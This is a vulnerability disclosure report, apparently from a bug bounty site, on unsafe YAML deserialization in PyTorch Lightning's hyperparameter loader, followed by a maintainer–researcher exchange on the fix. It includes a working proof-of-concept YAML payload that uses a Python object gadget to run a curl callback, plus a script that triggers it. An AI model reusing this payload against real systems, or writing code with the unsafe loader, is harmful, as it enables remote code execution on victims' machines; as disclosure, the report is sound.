Deserialization of Untrusted Data in pytorchlightning/pytorch-lightning

Valid

Reported on

Dec 12th 2021


Description

There is untrusted YAML Deserialization vulnerability on PyTorchLightning Github repository. PyTorchLightning's saving.py (core.saving.load_hparams_from_yaml) functionality is calling "yaml.UnsafeLoader" from pyyaml Python library which is not secure method. Because of that, maliciously crafted yaml config file can cause code execution on the victim's machine.

Proof of Concept

  • Here is the poc.py file:
from pytorch_lightning import core
core.saving.load_hparams_from_yaml("evil.yaml")
  • Here is the evil.yaml file:
- !!python/object/new:yaml.MappingNode
  listitems: !!str '!!python/object/apply:subprocess.Popen [["curl", "127.0.0.1:8080/rce"]]'
  state:
    tag: !!str dummy
    value: !!str dummy
    extend: !!python/name:yaml.unsafe_load
  • After that, you need to start HTTP server on your attacker machine's port 8080. When you run the below command, you will see the HTTP request from the victim host because of the malicious yaml file.
python3 -m http.server 8080
  • Run the poc.py file after that you will see HTTP request from coming the victim host,
python3 poc.py

Impact

Maliciously crafted yaml config file can cause code execution on the victim's machine.

Occurrences

We are processing your report and will contact the pytorchlightning/pytorch-lightning team within 24 hours. a year ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md a year ago
Carlos Mocholí validated this vulnerability a year ago
oivrip has been awarded the disclosure bounty
The fix bounty is now up for grabs
Carlos Mocholí
a year ago

Maintainer


As mentioned in the reference link, is the fix just updating https://github.com/PyTorchLightning/pytorch-lightning/blob/7aee00c679d64ed62c0e119415ac3e02a0e434fb/requirements.txt#L7 to >=5.3.1?

oivrip
a year ago

Researcher


Actually, I don't have very deep knowledge about the pyyaml library, but I would recommend you to update the library to the latest version rather than the 5.3.1 version because as you can see from this link, it is said that there may be some problems in the 5.3.1 version. In addition, the use of UnsafeLoder may also open the door to different deserilization vulnerabilities in the future. For this reason, I can recommend you to examine other pyyaml loader functions such as FullLoader and SafeLoader. As the name suggests, if your application will not cause any incompatibility problems, using "yaml.SafeLoader" after updating the pyyaml library seems like the most guaranteed solution.

oivrip
a year ago

Researcher


Another reference about this subject: https://blog.ankursundara.com/pyyaml-cve/

Carlos Mocholí
a year ago

Maintainer


Okay, thank you! Do you want to open a PR so you get the fix bounty?

oivrip
a year ago

Researcher


Thank you for your offer! You can open a PR.

Carlos Mocholí marked this as fixed in 1.6 with commit 62f1e8 a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
saving.py#L347 has been validated
to join this conversation